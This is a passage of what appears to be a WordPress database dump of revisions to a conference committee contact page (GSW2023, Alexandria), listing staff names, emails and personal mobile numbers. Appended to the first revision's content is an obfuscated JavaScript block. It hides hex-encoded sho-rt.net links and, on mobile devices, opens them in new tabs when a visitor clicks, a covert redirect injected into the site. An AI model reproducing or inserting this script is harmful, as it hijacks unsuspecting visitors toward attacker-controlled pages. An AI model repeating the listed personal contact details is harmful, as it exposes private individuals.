el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688069525009{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Web Director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-29 20:12:09','2023-06-29 20:12:09','',4849,'https://gsw2023.com/?p=4966',0,'revision','',0),
(4967,4,'2023-06-29 20:14:45','2023-06-29 20:14:45','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688069670240{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Web Director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ay.zagh@gmail.com\">ay.zagh@gmail.com</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" 